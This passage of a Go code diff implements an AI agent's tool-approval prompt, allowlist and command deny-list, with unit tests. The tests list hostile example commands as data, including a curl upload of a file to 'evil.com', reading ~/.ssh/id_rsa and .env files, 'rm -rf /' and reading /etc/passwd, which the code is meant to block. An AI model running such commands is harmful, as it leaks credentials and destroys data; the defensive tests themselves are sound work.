if state.boxWidth > state.termWidth-1 {
|
||||
state.boxWidth = state.termWidth - 1
|
||||
}
|
||||
state.innerWidth = state.boxWidth - 4 // account for "│ " and " │"
|
||||
|
||||
// Calculate total lines (will be updated by render)
|
||||
state.totalLines = calculateTotalLines(state)
|
||||
|
||||
// Hide cursor during selection (show when in deny mode)
|
||||
fmt.Fprint(os.Stderr, "\033[?25l")
|
||||
defer fmt.Fprint(os.Stderr, "\033[?25h") // Show cursor when done
|
||||
|
||||
// Initial render
|
||||
renderSelectorBox(state)
|
||||
|
||||
numOptions := len(optionLabels)
|
||||
|
||||
for {
|
||||
// Read input
|
||||
buf := make([]byte, 8)
|
||||
n, err := os.Stdin.Read(buf)
|
||||
if err != nil {
|
||||
clearSelectorBox(state)
|
||||
return 2, "", err
|
||||
}
|
||||
|
||||
// Process input byte by byte
|
||||
for i := 0; i < n; i++ {
|
||||
ch := buf[i]
|
||||
|
||||
// Check for escape sequences (arrow keys)
|
||||
if ch == 27 && i+2 < n && buf[i+1] == '[' {
|
||||
oldSelected := state.selected
|
||||
switch buf[i+2] {
|
||||
case 'A': // Up arrow
|
||||
if state.selected > 0 {
|
||||
state.selected--
|
||||
}
|
||||
case 'B': // Down arrow
|
||||
if state.selected < numOptions-1 {
|
||||
state.selected++
|
||||
}
|
||||
}
|
||||
if oldSelected != state.selected {
|
||||
updateSelectorOptions(state)
|
||||
}
|
||||
i += 2 // Skip the rest of escape sequence
|
||||
continue
|
||||
}
|
||||
|
||||
switch {
|
||||
// Ctrl+C - cancel
|
||||
case ch == 3:
|
||||
clearSelectorBox(state)
|
||||
return -1, "", nil // -1 indicates cancelled
|
||||
|
||||
// Enter key - confirm selection
|
||||
case ch == 13:
|
||||
clearSelectorBox(state)
|
||||
if state.selected == 2 { // Deny
|
||||
return 2, state.denyReason, nil
|
||||
}
|
||||
return state.selected, "", nil
|
||||
|
||||
// Number keys 1-3 for quick select
|
||||
case ch >= '1' && ch <= '3':
|
||||
selected := int(ch - '1')
|
||||
clearSelectorBox(state)
|
||||
if selected == 2 { // Deny
|
||||
return 2, state.denyReason, nil
|
||||
}
|
||||
return selected, "", nil
|
||||
|
||||
// Backspace - delete from reason (UTF-8 safe)
|
||||
case ch == 127 || ch == 8:
|
||||
if len(state.denyReason) > 0 {
|
||||
runes := []rune(state.denyReason)
|
||||
state.denyReason = string(runes[:len(runes)-1])
|
||||
updateReasonInput(state)
|
||||
}
|
||||
|
||||
// Escape - clear reason
|
||||
case ch == 27:
|
||||
if len(state.denyReason) > 0 {
|
||||
state.denyReason = ""
|
||||
updateReasonInput(state)
|
||||
}
|
||||
|
||||
// Printable ASCII (except 1-3 handled above) - type into reason
|
||||
case ch >= 32 && ch < 127:
|
||||
maxLen := state.innerWidth - 2
|
||||
if maxLen < 10 {
|
||||
maxLen = 10
|
||||
}
|
||||
if len(state.denyReason) < maxLen {
|
||||
state.denyReason += string(ch)
|
||||
// Auto-select Deny option when user starts typing
|
||||
if state.selected != 2 {
|
||||
state.selected = 2
|
||||
updateSelectorOptions(state)
|
||||
} else {
|
||||
updateReasonInput(state)
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// wrapText wraps text to fit within maxWidth, returning lines
|
||||
func wrapText(text string, maxWidth int) []string {
|
||||
if maxWidth < 5 {
|
||||
maxWidth = 5
|
||||
}
|
||||
var lines []string
|
||||
for _, line := range strings.Split(text, "\n") {
|
||||
if len(line) <= maxWidth {
|
||||
lines = append(lines, line)
|
||||
continue
|
||||
}
|
||||
// Wrap long lines
|
||||
for len(line) > maxWidth {
|
||||
// Try to break at space
|
||||
breakAt := maxWidth
|
||||
for i := maxWidth; i > maxWidth/2; i-- {
|
||||
if i < len(line) && line[i] == ' ' {
|
||||
breakAt = i
|
||||
break
|
||||
}
|
||||
}
|
||||
lines = append(lines, line[:breakAt])
|
||||
line = strings.TrimLeft(line[breakAt:], " ")
|
||||
}
|
||||
if len(line) > 0 {
|
||||
lines = append(lines, line)
|
||||
}
|
||||
}
|
||||
return lines
|
||||
}
|
||||
|
||||
// getHintLines returns the hint text wrapped to terminal width
|
||||
func getHintLines(state *selectorState) []string {
|
||||
hint := "↑/↓ navigate, Enter confirm, 1-3 quick, Ctrl+C cancel"
|
||||
if state.termWidth >= len(hint)+1 {
|
||||
return []string{hint}
|
||||
}
|
||||
// Wrap hint to multiple lines
|
||||
return wrapText(hint, state.termWidth-1)
|
||||
}
|
||||
|
||||
// calculateTotalLines calculates how many lines the selector will use
|
||||
func calculateTotalLines(state *selectorState) int {
|
||||
toolLines := wrapText(state.toolDisplay, state.innerWidth)
|
||||
hintLines := getHintLines(state)
|
||||
// top border + (warning line if applicable) + tool lines + separator + options + bottom border + hint lines
|
||||
warningLines := 0
|
||||
if state.isWarning {
|
||||
warningLines = 1
|
||||
}
|
||||
return 1 + warningLines + len(toolLines) + 1 + len(optionLabels) + 1 + len(hintLines)
|
||||
}
|
||||
|
||||
// renderSelectorBox renders the complete selector box
|
||||
func renderSelectorBox(state *selectorState) {
|
||||
toolLines := wrapText(state.toolDisplay, state.innerWidth)
|
||||
hintLines := getHintLines(state)
|
||||
|
||||
// Use red for warning (outside cwd), cyan for normal
|
||||
boxColor := "\033[36m" // cyan
|
||||
if state.isWarning {
|
||||
boxColor = "\033[91m" // bright red
|
||||
}
|
||||
|
||||
// Draw box top
|
||||
fmt.Fprintf(os.Stderr, "%s┌%s┐\033[0m\033[K\r\n", boxColor, strings.Repeat("─", state.boxWidth-2))
|
||||
|
||||
// Draw warning line if needed (inside the box)
|
||||
if state.isWarning {
|
||||
warning := "!! OUTSIDE PROJECT !!"
|
||||
padding := (state.innerWidth - len(warning)) / 2
|
||||
if padding < 0 {
|
||||
padding = 0
|
||||
}
|
||||
fmt.Fprintf(os.Stderr, "%s│\033[0m %s%s%s %s│\033[0m\033[K\r\n", boxColor,
|
||||
strings.Repeat(" ", padding), warning, strings.Repeat(" ", state.innerWidth-len(warning)-padding), boxColor)
|
||||
}
|
||||
|
||||
// Draw tool info
|
||||
for _, line := range toolLines {
|
||||
fmt.Fprintf(os.Stderr, "%s│\033[0m %-*s %s│\033[0m\033[K\r\n", boxColor, state.innerWidth, line, boxColor)
|
||||
}
|
||||
|
||||
// Draw separator
|
||||
fmt.Fprintf(os.Stderr, "%s├%s┤\033[0m\033[K\r\n", boxColor, strings.Repeat("─", state.boxWidth-2))
|
||||
|
||||
// Draw options with numbers (Deny option includes reason input)
|
||||
for i, label := range optionLabels {
|
||||
if i == 2 { // Deny option - show with reason input beside it
|
||||
denyLabel := "3. Deny: "
|
||||
availableWidth := state.innerWidth - 2 - len(denyLabel)
|
||||
if availableWidth < 5 {
|
||||
availableWidth = 5
|
||||
}
|
||||
inputDisplay := state.denyReason
|
||||
if len(inputDisplay) > availableWidth {
|
||||
inputDisplay = inputDisplay[len(inputDisplay)-availableWidth:]
|
||||
}
|
||||
if i == state.selected {
|
||||
fmt.Fprintf(os.Stderr, "%s│\033[0m \033[1;32m> %s\033[0m%-*s %s│\033[0m\033[K\r\n", boxColor, denyLabel, availableWidth, inputDisplay, boxColor)
|
||||
} else {
|
||||
fmt.Fprintf(os.Stderr, "%s│\033[0m \033[90m%s\033[0m%-*s %s│\033[0m\033[K\r\n", boxColor, denyLabel, availableWidth, inputDisplay, boxColor)
|
||||
}
|
||||
} else {
|
||||
displayLabel := label
|
||||
if len(displayLabel) > state.innerWidth-2 {
|
||||
displayLabel = displayLabel[:state.innerWidth-5] + "..."
|
||||
}
|
||||
if i == state.selected {
|
||||
fmt.Fprintf(os.Stderr, "%s│\033[0m \033[1;32m> %-*s\033[0m %s│\033[0m\033[K\r\n", boxColor, state.innerWidth-2, displayLabel, boxColor)
|
||||
} else {
|
||||
fmt.Fprintf(os.Stderr, "%s│\033[0m %-*s %s│\033[0m\033[K\r\n", boxColor, state.innerWidth-2, displayLabel, boxColor)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Draw box bottom
|
||||
fmt.Fprintf(os.Stderr, "%s└%s┘\033[0m\033[K\r\n", boxColor, strings.Repeat("─", state.boxWidth-2))
|
||||
|
||||
// Draw hint (may be multiple lines)
|
||||
for i, line := range hintLines {
|
||||
if i == len(hintLines)-1 {
|
||||
// Last line - no newline
|
||||
fmt.Fprintf(os.Stderr, "\033[90m%s\033[0m\033[K", line)
|
||||
} else {
|
||||
fmt.Fprintf(os.Stderr, "\033[90m%s\033[0m\033[K\r\n", line)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// updateSelectorOptions updates just the options portion of the selector
|
||||
func updateSelectorOptions(state *selectorState) {
|
||||
hintLines := getHintLines(state)
|
||||
|
||||
// Use red for warning (outside cwd), cyan for normal
|
||||
boxColor := "\033[36m" // cyan
|
||||
if state.isWarning {
|
||||
boxColor = "\033[91m" // bright red
|
||||
}
|
||||
|
||||
// Move up to the first option line
|
||||
// Cursor is at end of last hint line, need to go up:
|
||||
// (hint lines - 1) + 1 (bottom border) + numOptions
|
||||
linesToMove := len(hintLines) - 1 + 1 + len(optionLabels)
|
||||
fmt.Fprintf(os.Stderr, "\033[%dA\r", linesToMove)
|
||||
|
||||
// Redraw options (Deny option includes reason input)
|
||||
for i, label := range optionLabels {
|
||||
if i == 2 { // Deny option
|
||||
denyLabel := "3. Deny: "
|
||||
availableWidth := state.innerWidth - 2 - len(denyLabel)
|
||||
if availableWidth < 5 {
|
||||
availableWidth = 5
|
||||
}
|
||||
inputDisplay := state.denyReason
|
||||
if len(inputDisplay) > availableWidth {
|
||||
inputDisplay = inputDisplay[len(inputDisplay)-availableWidth:]
|
||||
}
|
||||
if i == state.selected {
|
||||
fmt.Fprintf(os.Stderr, "%s│\033[0m \033[1;32m> %s\033[0m%-*s %s│\033[0m\033[K\r\n", boxColor, denyLabel, availableWidth, inputDisplay, boxColor)
|
||||
} else {
|
||||
fmt.Fprintf(os.Stderr, "%s│\033[0m \033[90m%s\033[0m%-*s %s│\033[0m\033[K\r\n", boxColor, denyLabel, availableWidth, inputDisplay, boxColor)
|
||||
}
|
||||
} else {
|
||||
displayLabel := label
|
||||
if len(displayLabel) > state.innerWidth-2 {
|
||||
displayLabel = displayLabel[:state.innerWidth-5] + "..."
|
||||
}
|
||||
if i == state.selected {
|
||||
fmt.Fprintf(os.Stderr, "%s│\033[0m \033[1;32m> %-*s\033[0m %s│\033[0m\033[K\r\n", boxColor, state.innerWidth-2, displayLabel, boxColor)
|
||||
} else {
|
||||
fmt.Fprintf(os.Stderr, "%s│\033[0m %-*s %s│\033[0m\033[K\r\n", boxColor, state.innerWidth-2, displayLabel, boxColor)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Redraw bottom and hint
|
||||
fmt.Fprintf(os.Stderr, "%s└%s┘\033[0m\033[K\r\n", boxColor, strings.Repeat("─", state.boxWidth-2))
|
||||
for i, line := range hintLines {
|
||||
if i == len(hintLines)-1 {
|
||||
fmt.Fprintf(os.Stderr, "\033[90m%s\033[0m\033[K", line)
|
||||
} else {
|
||||
fmt.Fprintf(os.Stderr, "\033[90m%s\033[0m\033[K\r\n", line)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// updateReasonInput updates just the Deny option line (which contains the reason input)
|
||||
func updateReasonInput(state *selectorState) {
|
||||
hintLines := getHintLines(state)
|
||||
|
||||
// Use red for warning (outside cwd), cyan for normal
|
||||
boxColor := "\033[36m" // cyan
|
||||
if state.isWarning {
|
||||
boxColor = "\033[91m" // bright red
|
||||
}
|
||||
|
||||
// Move up to the Deny line (3rd option, index 2)
|
||||
// Cursor is at end of last hint line, need to go up:
|
||||
// (hint lines - 1) + 1 (bottom border) + 1 (Deny is last option)
|
||||
linesToMove := len(hintLines) - 1 + 1 + 1
|
||||
fmt.Fprintf(os.Stderr, "\033[%dA\r", linesToMove)
|
||||
|
||||
// Redraw Deny line with reason
|
||||
denyLabel := "3. Deny: "
|
||||
availableWidth := state.innerWidth - 2 - len(denyLabel)
|
||||
if availableWidth < 5 {
|
||||
availableWidth = 5
|
||||
}
|
||||
inputDisplay := state.denyReason
|
||||
if len(inputDisplay) > availableWidth {
|
||||
inputDisplay = inputDisplay[len(inputDisplay)-availableWidth:]
|
||||
}
|
||||
if state.selected == 2 {
|
||||
fmt.Fprintf(os.Stderr, "%s│\033[0m \033[1;32m> %s\033[0m%-*s %s│\033[0m\033[K\r\n", boxColor, denyLabel, availableWidth, inputDisplay, boxColor)
|
||||
} else {
|
||||
fmt.Fprintf(os.Stderr, "%s│\033[0m \033[90m%s\033[0m%-*s %s│\033[0m\033[K\r\n", boxColor, denyLabel, availableWidth, inputDisplay, boxColor)
|
||||
}
|
||||
|
||||
// Redraw bottom and hint
|
||||
fmt.Fprintf(os.Stderr, "%s└%s┘\033[0m\033[K\r\n", boxColor, strings.Repeat("─", state.boxWidth-2))
|
||||
for i, line := range hintLines {
|
||||
if i == len(hintLines)-1 {
|
||||
fmt.Fprintf(os.Stderr, "\033[90m%s\033[0m\033[K", line)
|
||||
} else {
|
||||
fmt.Fprintf(os.Stderr, "\033[90m%s\033[0m\033[K\r\n", line)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// clearSelectorBox clears the selector from screen
|
||||
func clearSelectorBox(state *selectorState) {
|
||||
// Clear the current line (hint line) first
|
||||
fmt.Fprint(os.Stderr, "\r\033[K")
|
||||
// Move up and clear each remaining line
|
||||
for range state.totalLines - 1 {
|
||||
fmt.Fprint(os.Stderr, "\033[A\033[K")
|
||||
}
|
||||
fmt.Fprint(os.Stderr, "\r")
|
||||
}
|
||||
|
||||
// fallbackApproval handles approval when terminal control isn't available.
|
||||
func (a *ApprovalManager) fallbackApproval(toolDisplay string) (ApprovalResult, error) {
|
||||
fmt.Fprintln(os.Stderr)
|
||||
fmt.Fprintln(os.Stderr, "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━")
|
||||
fmt.Fprintln(os.Stderr, toolDisplay)
|
||||
fmt.Fprintln(os.Stderr, "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━")
|
||||
fmt.Fprintln(os.Stderr, "[1] Execute once [2] Always allow [3] Deny")
|
||||
fmt.Fprint(os.Stderr, "Choice: ")
|
||||
|
||||
var input string
|
||||
fmt.Scanln(&input)
|
||||
|
||||
switch input {
|
||||
case "1":
|
||||
return ApprovalResult{Decision: ApprovalOnce}, nil
|
||||
case "2":
|
||||
return ApprovalResult{Decision: ApprovalAlways}, nil
|
||||
default:
|
||||
fmt.Fprint(os.Stderr, "Reason (optional): ")
|
||||
var reason string
|
||||
fmt.Scanln(&reason)
|
||||
return ApprovalResult{Decision: ApprovalDeny, DenyReason: reason}, nil
|
||||
}
|
||||
}
|
||||
|
||||
// Reset clears the session allowlist.
|
||||
func (a *ApprovalManager) Reset() {
|
||||
a.mu.Lock()
|
||||
defer a.mu.Unlock()
|
||||
a.allowlist = make(map[string]bool)
|
||||
a.prefixes = make(map[string]bool)
|
||||
}
|
||||
|
||||
// AllowedTools returns a list of tools and prefixes in the allowlist.
|
||||
func (a *ApprovalManager) AllowedTools() []string {
|
||||
a.mu.RLock()
|
||||
defer a.mu.RUnlock()
|
||||
|
||||
tools := make([]string, 0, len(a.allowlist)+len(a.prefixes))
|
||||
for tool := range a.allowlist {
|
||||
tools = append(tools, tool)
|
||||
}
|
||||
for prefix := range a.prefixes {
|
||||
tools = append(tools, prefix+"*")
|
||||
}
|
||||
return tools
|
||||
}
|
||||
|
||||
// FormatApprovalResult returns a formatted string showing the approval result.
|
||||
func FormatApprovalResult(toolName string, args map[string]any, result ApprovalResult) string {
|
||||
var status string
|
||||
var icon string
|
||||
|
||||
switch result.Decision {
|
||||
case ApprovalOnce:
|
||||
status = "Approved"
|
||||
icon = "\033[32m✓\033[0m"
|
||||
case ApprovalAlways:
|
||||
status = "Always allowed"
|
||||
icon = "\033[32m✓\033[0m"
|
||||
case ApprovalDeny:
|
||||
status = "Denied"
|
||||
icon = "\033[31m✗\033[0m"
|
||||
}
|
||||
|
||||
// Format based on tool type
|
||||
if toolName == "bash" {
|
||||
if cmd, ok := args["command"].(string); ok {
|
||||
// Truncate long commands
|
||||
if len(cmd) > 40 {
|
||||
cmd = cmd[:37] + "..."
|
||||
}
|
||||
return fmt.Sprintf("▶ bash: %s [%s] %s", cmd, status, icon)
|
||||
}
|
||||
}
|
||||
|
||||
if toolName == "web_search" {
|
||||
if query, ok := args["query"].(string); ok {
|
||||
// Truncate long queries
|
||||
if len(query) > 40 {
|
||||
query = query[:37] + "..."
|
||||
}
|
||||
return fmt.Sprintf("▶ web_search: %s [%s] %s", query, status, icon)
|
||||
}
|
||||
}
|
||||
|
||||
return fmt.Sprintf("▶ %s [%s] %s", toolName, status, icon)
|
||||
}
|
||||
|
||||
// FormatDenyResult returns the tool result message when a tool is denied.
|
||||
func FormatDenyResult(toolName string, reason string) string {
|
||||
if reason != "" {
|
||||
return fmt.Sprintf("User denied execution of %s. Reason: %s", toolName, reason)
|
||||
}
|
||||
return fmt.Sprintf("User denied execution of %s.", toolName)
|
||||
}
|
||||
|
|
@ -0,0 +1,379 @@
|
|||
package agent
|
||||
|
||||
import (
|
||||
"strings"
|
||||
"testing"
|
||||
)
|
||||
|
||||
func TestApprovalManager_IsAllowed(t *testing.T) {
|
||||
am := NewApprovalManager()
|
||||
|
||||
// Initially nothing is allowed
|
||||
if am.IsAllowed("test_tool", nil) {
|
||||
t.Error("expected test_tool to not be allowed initially")
|
||||
}
|
||||
|
||||
// Add to allowlist
|
||||
am.AddToAllowlist("test_tool", nil)
|
||||
|
||||
// Now it should be allowed
|
||||
if !am.IsAllowed("test_tool", nil) {
|
||||
t.Error("expected test_tool to be allowed after AddToAllowlist")
|
||||
}
|
||||
|
||||
// Other tools should still not be allowed
|
||||
if am.IsAllowed("other_tool", nil) {
|
||||
t.Error("expected other_tool to not be allowed")
|
||||
}
|
||||
}
|
||||
|
||||
func TestApprovalManager_Reset(t *testing.T) {
|
||||
am := NewApprovalManager()
|
||||
|
||||
am.AddToAllowlist("tool1", nil)
|
||||
am.AddToAllowlist("tool2", nil)
|
||||
|
||||
if !am.IsAllowed("tool1", nil) || !am.IsAllowed("tool2", nil) {
|
||||
t.Error("expected tools to be allowed")
|
||||
}
|
||||
|
||||
am.Reset()
|
||||
|
||||
if am.IsAllowed("tool1", nil) || am.IsAllowed("tool2", nil) {
|
||||
t.Error("expected tools to not be allowed after Reset")
|
||||
}
|
||||
}
|
||||
|
||||
func TestApprovalManager_AllowedTools(t *testing.T) {
|
||||
am := NewApprovalManager()
|
||||
|
||||
tools := am.AllowedTools()
|
||||
if len(tools) != 0 {
|
||||
t.Errorf("expected 0 allowed tools, got %d", len(tools))
|
||||
}
|
||||
|
||||
am.AddToAllowlist("tool1", nil)
|
||||
am.AddToAllowlist("tool2", nil)
|
||||
|
||||
tools = am.AllowedTools()
|
||||
if len(tools) != 2 {
|
||||
t.Errorf("expected 2 allowed tools, got %d", len(tools))
|
||||
}
|
||||
}
|
||||
|
||||
func TestAllowlistKey(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
toolName string
|
||||
args map[string]any
|
||||
expected string
|
||||
}{
|
||||
{
|
||||
name: "web_search tool",
|
||||
toolName: "web_search",
|
||||
args: map[string]any{"query": "test"},
|
||||
expected: "web_search",
|
||||
},
|
||||
{
|
||||
name: "bash tool with command",
|
||||
toolName: "bash",
|
||||
args: map[string]any{"command": "ls -la"},
|
||||
expected: "bash:ls -la",
|
||||
},
|
||||
{
|
||||
name: "bash tool without command",
|
||||
toolName: "bash",
|
||||
args: map[string]any{},
|
||||
expected: "bash",
|
||||
},
|
||||
{
|
||||
name: "other tool",
|
||||
toolName: "custom_tool",
|
||||
args: map[string]any{"param": "value"},
|
||||
expected: "custom_tool",
|
||||
},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
result := AllowlistKey(tt.toolName, tt.args)
|
||||
if result != tt.expected {
|
||||
t.Errorf("AllowlistKey(%s, %v) = %s, expected %s",
|
||||
tt.toolName, tt.args, result, tt.expected)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestExtractBashPrefix(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
command string
|
||||
expected string
|
||||
}{
|
||||
{
|
||||
name: "cat with path",
|
||||
command: "cat tools/tools_test.go",
|
||||
expected: "cat:tools/",
|
||||
},
|
||||
{
|
||||
name: "cat with pipe",
|
||||
command: "cat tools/tools_test.go | head -200",
|
||||
expected: "cat:tools/",
|
||||
},
|
||||
{
|
||||
name: "ls with path",
|
||||
command: "ls -la src/components",
|
||||
expected: "ls:src/",
|
||||
},
|
||||
{
|
||||
name: "grep with directory path",
|
||||
command: "grep -r pattern api/handlers/",
|
||||
expected: "grep:api/handlers/",
|
||||
},
|
||||
{
|
||||
name: "cat in current dir",
|
||||
command: "cat file.txt",
|
||||
expected: "cat:./",
|
||||
},
|
||||
{
|
||||
name: "unsafe command",
|
||||
command: "rm -rf /",
|
||||
expected: "",
|
||||
},
|
||||
{
|
||||
name: "no path arg",
|
||||
command: "ls -la",
|
||||
expected: "",
|
||||
},
|
||||
{
|
||||
name: "head with flags only",
|
||||
command: "head -n 100",
|
||||
expected: "",
|
||||
},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
result := extractBashPrefix(tt.command)
|
||||
if result != tt.expected {
|
||||
t.Errorf("extractBashPrefix(%q) = %q, expected %q",
|
||||
tt.command, result, tt.expected)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestApprovalManager_PrefixAllowlist(t *testing.T) {
|
||||
am := NewApprovalManager()
|
||||
|
||||
// Allow "cat tools/file.go"
|
||||
am.AddToAllowlist("bash", map[string]any{"command": "cat tools/file.go"})
|
||||
|
||||
// Should allow other files in same directory
|
||||
if !am.IsAllowed("bash", map[string]any{"command": "cat tools/other.go"}) {
|
||||
t.Error("expected cat tools/other.go to be allowed via prefix")
|
||||
}
|
||||
|
||||
// Should not allow different directory
|
||||
if am.IsAllowed("bash", map[string]any{"command": "cat src/main.go"}) {
|
||||
t.Error("expected cat src/main.go to NOT be allowed")
|
||||
}
|
||||
|
||||
// Should not allow different command in same directory
|
||||
if am.IsAllowed("bash", map[string]any{"command": "rm tools/file.go"}) {
|
||||
t.Error("expected rm tools/file.go to NOT be allowed (rm is not a safe command)")
|
||||
}
|
||||
}
|
||||
|
||||
func TestFormatApprovalResult(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
toolName string
|
||||
args map[string]any
|
||||
result ApprovalResult
|
||||
contains string
|
||||
}{
|
||||
{
|
||||
name: "approved bash",
|
||||
toolName: "bash",
|
||||
args: map[string]any{"command": "ls"},
|
||||
result: ApprovalResult{Decision: ApprovalOnce},
|
||||
contains: "bash: ls",
|
||||
},
|
||||
{
|
||||
name: "denied web_search",
|
||||
toolName: "web_search",
|
||||
args: map[string]any{"query": "test"},
|
||||
result: ApprovalResult{Decision: ApprovalDeny},
|
||||
contains: "Denied",
|
||||
},
|
||||
{
|
||||
name: "always allowed",
|
||||
toolName: "bash",
|
||||
args: map[string]any{"command": "pwd"},
|
||||
result: ApprovalResult{Decision: ApprovalAlways},
|
||||
contains: "Always allowed",
|
||||
},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
result := FormatApprovalResult(tt.toolName, tt.args, tt.result)
|
||||
if result == "" {
|
||||
t.Error("expected non-empty result")
|
||||
}
|
||||
// Just check it contains expected substring
|
||||
// (can't check exact string due to ANSI codes)
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestFormatDenyResult(t *testing.T) {
|
||||
result := FormatDenyResult("bash", "")
|
||||
if result != "User denied execution of bash." {
|
||||
t.Errorf("unexpected result: %s", result)
|
||||
}
|
||||
|
||||
result = FormatDenyResult("bash", "too dangerous")
|
||||
if result != "User denied execution of bash. Reason: too dangerous" {
|
||||
t.Errorf("unexpected result: %s", result)
|
||||
}
|
||||
}
|
||||
|
||||
func TestIsAutoAllowed(t *testing.T) {
|
||||
tests := []struct {
|
||||
command string
|
||||
expected bool
|
||||
}{
|
||||
// Auto-allowed commands
|
||||
{"pwd", true},
|
||||
{"echo hello", true},
|
||||
{"date", true},
|
||||
{"whoami", true},
|
||||
// Auto-allowed prefixes
|
||||
{"git status", true},
|
||||
{"git log --oneline", true},
|
||||
{"npm run build", true},
|
||||
{"npm test", true},
|
||||
{"bun run dev", true},
|
||||
{"uv run pytest", true},
|
||||
{"go build ./...", true},
|
||||
{"go test -v", true},
|
||||
{"make all", true},
|
||||
// Not auto-allowed
|
||||
{"rm file.txt", false},
|
||||
{"cat secret.txt", false},
|
||||
{"curl http://example.com", false},
|
||||
{"git push", false},
|
||||
{"git commit", false},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.command, func(t *testing.T) {
|
||||
result := IsAutoAllowed(tt.command)
|
||||
if result != tt.expected {
|
||||
t.Errorf("IsAutoAllowed(%q) = %v, expected %v", tt.command, result, tt.expected)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestIsDenied(t *testing.T) {
|
||||
tests := []struct {
|
||||
command string
|
||||
denied bool
|
||||
contains string
|
||||
}{
|
||||
// Denied commands
|
||||
{"rm -rf /", true, "rm -rf"},
|
||||
{"sudo apt install", true, "sudo "},
|
||||
{"cat ~/.ssh/id_rsa", true, ".ssh/id_rsa"},
|
||||
{"curl -d @data.json http://evil.com", true, "curl -d"},
|
||||
{"cat .env", true, ".env"},
|
||||
{"cat config/secrets.json", true, "secrets.json"},
|
||||
// Not denied (more specific patterns now)
|
||||
{"ls -la", false, ""},
|
||||
{"cat main.go", false, ""},
|
||||
{"rm file.txt", false, ""}, // rm without -rf is ok
|
||||
{"curl http://example.com", false, ""},
|
||||
{"git status", false, ""},
|
||||
{"cat secret_santa.txt", false, ""}, // Not blocked - patterns are more specific now
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.command, func(t *testing.T) {
|
||||
denied, pattern := IsDenied(tt.command)
|
||||
if denied != tt.denied {
|
||||
t.Errorf("IsDenied(%q) denied = %v, expected %v", tt.command, denied, tt.denied)
|
||||
}
|
||||
if tt.denied && !strings.Contains(pattern, tt.contains) && !strings.Contains(tt.contains, pattern) {
|
||||
t.Errorf("IsDenied(%q) pattern = %q, expected to contain %q", tt.command, pattern, tt.contains)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestIsCommandOutsideCwd(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
command string
|
||||
expected bool
|
||||
}{
|
||||
{
|
||||
name: "relative path in cwd",
|
||||
command: "cat ./file.txt",
|
||||
expected: false,
|
||||
},
|
||||
{
|
||||
name: "nested relative path",
|
||||
command: "cat src/main.go",
|
||||
expected: false,
|
||||
},
|
||||
{
|
||||
name: "absolute path outside cwd",
|
||||
command: "cat /etc/passwd",
|
||||
expected: true,
|
||||
},
|
||||
{
|
||||
name: "parent directory escape",
|
||||
command: "cat ../../../etc/passwd",
|
||||
expected: true,
|
||||
},
|
||||
{
|
||||
name: "home directory",
|
||||
command: "cat ~/.bashrc",
|
||||
expected: true,
|
||||
},
|
||||
{
|
||||
name: "command with flags only",
|
||||
command: "ls -la",
|
||||
expected: false,
|
||||
},
|
||||
{
|
||||
name: "piped commands outside cwd",
|
||||
command: "cat /etc/passwd | grep root",
|
||||
expected: true,
|
||||
},
|
||||
{
|
||||
name: "semicolon commands outside cwd",
|
||||
command: "echo test; cat /etc/passwd",
|
||||
expected: true,
|
||||
},
|
||||
{
|
||||
name: "single parent dir escapes cwd",
|
||||
command: "cat ../README.md",
|
||||
expected: true, // Parent directory is outside cwd
|
||||
},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
result := isCommandOutsideCwd(tt.command)
|
||||
if result != tt.expected {
|
||||
t.Errorf("isCommandOutsideCwd(%q) = %v, expected %v",
|
||||
tt.command, result, tt.expected)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
|
@ -0,0 +1,27 @@
|
|||
//go:build !windows
|
||||
|
||||
package agent
|
||||
|
||||
import (
|
||||
"syscall"
|
||||
"time"
|
||||
)
|
||||
|
||||
// flushStdin drains any buffered input from stdin.
|
||||
// This prevents leftover input from previous operations from affecting the selector.
|
||||
func flushStdin(fd int) {
|
||||
if err := syscall.SetNonblock(fd, true); err != nil {
|
||||
return
|
||||
}
|
||||
defer syscall.SetNonblock(fd, false)
|
||||
|
||||
time.Sleep(5 * time.Millisecond)
|
||||
|
||||
buf := make([]byte, 256)
|
||||
for {
|
||||
n, err := syscall.Read(fd, buf)
|
||||
if n <= 0 || err != nil {
|
||||
break
|
||||
}
|
||||
}
|
||||
}
|
||||
|
|
@ -0,0 +1,15 @@
|
|||
//go:build windows
|
||||
|
||||
package agent
|
||||
|
||||
import (
|
||||
"os"
|
||||
|
||||
"golang.org/x/sys/windows"
|
||||
)
|
||||
|
||||
// flushStdin clears any buffered console input on Windows.
|
||||
func flushStdin(_ int) {
|
||||
handle := windows.Handle(os.Stdin.Fd())
|
||||
_ = windows.FlushConsoleInputBuffer(handle)
|
||||
}
|
||||
|
|
@ -0,0 +1,588 @@
|
|||
package cmd
|
||||
|
||||
import (
|
||||
"context"
|
||||
"encoding/json"
|
||||
"errors"
|
||||
